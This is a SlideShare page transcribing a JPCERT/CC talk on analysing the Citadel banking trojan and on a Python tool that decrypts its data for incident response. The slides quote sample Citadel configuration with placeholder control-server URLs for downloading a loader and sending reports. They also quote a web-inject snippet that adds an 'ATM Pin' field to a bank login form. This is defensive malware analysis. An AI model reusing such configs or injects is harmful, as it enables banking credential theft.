Fight Against Citadel in Japan  by You Nakatsuru
Upcoming SlideShare
Loading in...5
×
 

Fight Against Citadel in Japan  by You Nakatsuru

on

  • 847 views

Lately in Japan the malware Citadel has been implicated in multiple internet banking unauthorised transaction incidents. ...

Lately in Japan the malware Citadel has been implicated in multiple internet banking unauthorised transaction incidents.
Citadel is a type of malware much like the Zeus known as banking trojans. When the malware successfully infects the users environment it utilises special functions called Web Injects to alter the website displayed in the end users computer to steal login credentials for internet banking sites.
To handle Citadel infection incidents, it is necessary to clarify whatsettings and what servers the Citadel malware uses and communicates totherefore its essential to have an in-depth knowledge of Citadel and to conduct research on the files left by Citadel. In this presentation I will present my findings on doing detailed analysis on Citadel and introduce data transmission reconstruction and file reconstruction tools which have been created to handle Citadel incidents.

You Nakatsuru

You 'Tsuru' Nakatsuru, CISSP is a "just married" Information Security Analyst of Analysis Center at JPCERT/CC (Japan Computer Emergency Response Team Coordination Center) since April 2013.
His primary responsibilities are to analyze malware abused in highly sophisticated cyber attacks, along with R&D on advanced counter malware technologies and cutting-edge incident handling methods. He also takes an active role in capacity building for junior malware analysts.

Statistics

Views

Total Views
847
Views on SlideShare
839
Embed Views
8

Actions

Likes
2
Downloads
17
Comments
0

2 Embeds 8

http://www.slideee.com 6
https://www.linkedin.com 2

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Fight Against Citadel in Japan  by You Nakatsuru Fight Against Citadel in Japan  by You Nakatsuru Presentation Transcript

  • Fight Against Citadel in Japan 2014/02/18 JPCERT/CC Analysis Center NAKATSURU You
  • Copyright©2014 JPCERT/CC All rights reserved.1 Agenda Background —Unauthorized Remittance in Japan Analyzing Citadel —Overview —Encryption Making of Citadel Decryptor Citadel Decryptor —Usage —Demo
  • Copyright©2014 JPCERT/CC All rights reserved.2 BACKGROUND
  • Copyright©2014 JPCERT/CC All rights reserved.3 Illegal Transfer in Japan $14million $500k $3million 2011 2012 2013 http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf Targeting 32 Banks
  • Copyright©2014 JPCERT/CC All rights reserved.4 Related with Malware http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf In most cases, passwords are retrieved and abused through defaced web pages where malware request users to authenticate
  • Copyright©2014 JPCERT/CC All rights reserved.5 Banking Trojan ZeuS Ice IX Citadel GameOver SpyEye Carberp etc.
  • Copyright©2014 JPCERT/CC All rights reserved.6 Why Citadel? http://blog.trendmicro.com/trendlabs-security-intelligence/citadel-makes-a-comeback-targets-japan-users/
  • Copyright©2014 JPCERT/CC All rights reserved.7 Banking Trojan Incident Back Connect Server Web Panel Attacker User Internet Banking
  • Copyright©2014 JPCERT/CC All rights reserved.8 Web Injects User Internet Banking
  • Copyright©2014 JPCERT/CC All rights reserved.9 Web Injects Demo
  • Copyright©2014 JPCERT/CC All rights reserved.10 Builder & Web Panel
  • Copyright©2014 JPCERT/CC All rights reserved.11 Underground Market
  • Copyright©2014 JPCERT/CC All rights reserved.12 Our Incident Response Back Connect Server Web Panel Attacker User Internet Banking Information Sharing
  • Copyright©2014 JPCERT/CC All rights reserved.13 Information We Need Back Connect Server Web Panel Attacker User Internet Banking Which site is targeted Where Where How Where
  • Copyright©2014 JPCERT/CC All rights reserved.14 ANALYZING CITADEL
  • Copyright©2014 JPCERT/CC All rights reserved.15 External Information Leaked Citadel Web panel Builder Leaked ZeuS Web panel Builder ZeuS source Web panel source Builder source Binary Debug info Blogs Sophos LEXSI
  • Copyright©2014 JPCERT/CC All rights reserved.16 Analysis Method •Retrieving information Surface Analysis •Monitoring tools, Sandbox and debugging Runtime Analysis •Reading source code, assembly code Static Analysis
  • Copyright©2014 JPCERT/CC All rights reserved.17 Static Analysis Diffing with ZeuS
  • Copyright©2014 JPCERT/CC All rights reserved.18 Citadel Overview Sending report Current settings, etc. Web Injects
  • Copyright©2014 JPCERT/CC All rights reserved.19 Configuration Files •Default settings •Encryption key, URL of Dynamic Config •Encoded and hardcoded Base Config •Additional settings •HTTP Injection, etc… •Downloaded from servers Dynamic Config
  • Copyright©2014 JPCERT/CC All rights reserved.20 botnet "CIT" timer_config 4 9 timer_logs 3 6 timer_stats 4 8 timer_modules 1 4 timer_autoupdate 8 url_config1 "http://citadelhost/folder/file.php|file=config.dll" url_config2 "http://reserve-citadelhost/folder/file.php|file=config.dll" remove_certs 1 disable_cookies 0 encryption_key "key123" report_software 1 enable_luhn10_get 0 enable_luhn10_post 1 disable_antivirus 0 use_module_video 1 antiemulation_enable 0 disable_httpgrabber 0 use_module_ffcookie 1 Base Config Dynamic Config URL Password to generate RC4 key
  • Copyright©2014 JPCERT/CC All rights reserved.21 Dynamic Config url_loader "http://citadelhost/folder/file.php|file=soft.exe" url_server "http://citadelhost/folder/gate.php" file_webinjects "injects.txt" url_webinjects "http://citadelhost/folder/file.php" entry "AdvancedConfigs" "http://reserve-host1/folder/file.php|file=config.bin" "http://reserve-host2/folder/file.php|file=config.bin" end entry "WebFilters" "#*wellsfargo.com/*" "@*payment.com/*" "!http://*.com/*.jpg" end (snip) set_url https://www.wellsfargo.com/ GP data_before <div><strong><label for="userid">Username</la data_end data_inject <input type="text" accesskey="U" id="userid" na <DIV><STRONG><LABEL for=userid>ATM Pin</L style="WIDTH: 147px" tabIndex="2" maxLength= <DIV><STRONG><label for="password">Passwo <input type="password" accesskey="P" id="pass <input type="hidden" name="screenid" value="SI <input type="submit" value="Go" name="btnSign <input type="hidden" id="u_p" name="u_p" value </form> data_end
  • Copyright©2014 JPCERT/CC All rights reserved.22 Encryption
  • Copyright©2014 JPCERT/CC All rights reserved.23 Encrypted Data
  • Copyright©2014 JPCERT/CC All rights reserved.24 Encrypted Data Packet POST data (report file) Dynamic Config Additional modules File Report Backup of additional modules Registry Current settings Backup of Dynamic Config
  • Copyright©2014 JPCERT/CC All rights reserved.25 Encryption Method • AES encryption and XOR encoding AES+ • RC4 encryption and XOR encoding RC4+ • Encryption of RC4+ twice RC4+ * 2 • AES+ encryption using random generated key when installd Installed Data
  • Copyright©2014 JPCERT/CC All rights reserved.26 In Case of Dynamic Config Base Config Dynamic Config XOR AES+ UCL
  • Copyright©2014 JPCERT/CC All rights reserved.27 0x400 Bytes Overlay PE file PE file Install setting Installed data Before install After install XOR key ID, Install paths, AES key, StrageArray key, etc. Padding Padding
  • Copyright©2014 JPCERT/CC All rights reserved.28 Encryption Summary Category Data Format Encryption Packet Report Encrypted BinStrage RC4+ Dynamic Config Encrypted BinStrage AES+ Additional modules Executable RC4+ * 2 File Report file StrageArray Installed Data Backup of modules StrageArray Installed Data Registry Backup of Dynamic Config Encrypted BinStrage Installed Data
  • Copyright©2014 JPCERT/CC All rights reserved.29 MAKING OF CITADEL DECRYPTOR
  • Copyright©2014 JPCERT/CC All rights reserved.30 Our Goal Decrypt data & retrieve information for incident response
  • Copyright©2014 JPCERT/CC All rights reserved.31 Implementation Python PyCrypto pefile UCL
  • Copyright©2014 JPCERT/CC All rights reserved.32 RC4+ Decryption Get RC4 keystream RC4 Visual Decrypt
  • Copyright©2014 JPCERT/CC All rights reserved.33 RC4+ Implementation def rc4_plus_decrypt(login_key, base_key, buf): S1 = base_key['state'] S2 = map(ord, login_key) out = "" i = j = k = 0 for c in buf: i = (i + 1) & 0xFF j = (j + S1[i]) & 0xFF S1[i], S1[j] = S1[j], S1[i] out += chr((ord(c) ^ S1[(S1[i]+S1[j])&0xFF]) ^ S2[k%len(S2)]) k += 1 return out
  • Copyright©2014 JPCERT/CC All rights reserved.34 Get AES key AES Decrypt Visual Decrypt AES+ Decryption
  • Copyright©2014 JPCERT/CC All rights reserved.35 AES+ Implementation def unpack_aes_plus(login_key, base_key, xor_key, aes_key, data): aes = AES.new(aes_key) tmp = aes.decrypt(data) out = "" for i in range(len(tmp)): out += chr(ord(tmp[i]) ^ ord(xor_key[i%len(xor_key)])) return out
  • Copyright©2014 JPCERT/CC All rights reserved.36 Decryption Parameter Base Config RC4 key Installed Data StrageArray key Random AES key Others Salt LoginKey RC4 XOR key
  • Copyright©2014 JPCERT/CC All rights reserved.37 Obtaining Parameter re.compile(".*¥x56¥xBA(..)¥x00¥x00¥x52¥x68(....) ¥x50¥xE8....¥x8B¥x0D.*", re.DOTALL)
  • Copyright©2014 JPCERT/CC All rights reserved.38 UCL Decompress http://www.oberhumer.com/opensource/ucl/
  • Copyright©2014 JPCERT/CC All rights reserved.39 UCL Decompress using ctypes def _ucl_decompress(self, data): ucl = cdll.LoadLibrary(UCL) compressed = c_buffer(data) decompressed = c_buffer(DECOMPRESS_MAX_SIZE) decompressed_size = c_int() result = ucl.ucl_nrv2b_decompress_le32( pointer(compressed), c_int(len(compressed.raw)), pointer(decompressed), pointer(decompressed_size)) return decompressed.raw[:decompressed_size.value]
  • Copyright©2014 JPCERT/CC All rights reserved.40 CITADEL DECRYPTOR
  • Copyright©2014 JPCERT/CC All rights reserved.41 Environment • Citadel Decryptor is only available for 32bit environment Windows + 32bit Python • For AES decryption • Windows binary • http://www.voidspace.org.uk/python/modules.shtml#pycrypto PyCrypto • A Python module for parsing PE file format (Windows executable) • For parsing PE sections to get decryption params pefile
  • Copyright©2014 JPCERT/CC All rights reserved.42 Data Requirement Encrypted data Unpacked Citadel • RC4 key • XOR key for AES+ • XOR key for RC4+ (LOGINKEY) • Salt for RC4+ Installed Citadel • Installed Data • Random generated AES key • Random generated StrageArray key
  • Copyright©2014 JPCERT/CC All rights reserved.43 citadel_decryptor.py Encrypted data & unpacked module are always required >citadel_decryptor.py usage: citadel_decryptor.py [-h] [-n] [-a] [-d] [-o OUT] [-D] [-l LOGIN] [-k KEY] [-x XOR] [-s SALT] [-i INSTALLED] [-m MODE] [-v] DAT EXE citadel_decryptor.py: error: too few arguments >
  • Copyright©2014 JPCERT/CC All rights reserved.44 Cheat Sheet The following options have to be specified as well as encrypted data and unpacked Citadel Category Data Option Packet Report -m2 Dynamic Config -d Additional modules -m3 -n File Report files -a -i [Installed Citadel] Backup of modules -a -i [Installed Citadel] Registry Backup of Dynamic Config -d -i [Installed Citadel]
  • Copyright©2014 JPCERT/CC All rights reserved.45 Demo
  • Copyright©2014 JPCERT/CC All rights reserved.46 Tips Convert registry data to binary • Export data using regedit & convert them to binary using the following FileInsight plugin • https://github.com/nmantani/FileInsight-plugins Unpacking • It is easy to break on APIs • WriteProcessMemory • CreateProcessW • VirtualFree / VirtualFreeEx / RtlFreeHeap • Dump executable (not after allocated) from virtual memory • including 0x400 bytes overlay
  • Copyright©2014 JPCERT/CC All rights reserved.47 Future Tasks We already have • ZeuS Decryptor • Ver 2.0.8.9 • Ver 2.9.6.1 • Ice IX Decryptor • etc. We want • Gameover (P2P ZeuS) Decryptor
  • Thank You! Contact aa-info@jpcert.or.jp https://www.jpcert.or.jp Incident report info@jpcert.or.jp https://www.jpcert.or.jp/form/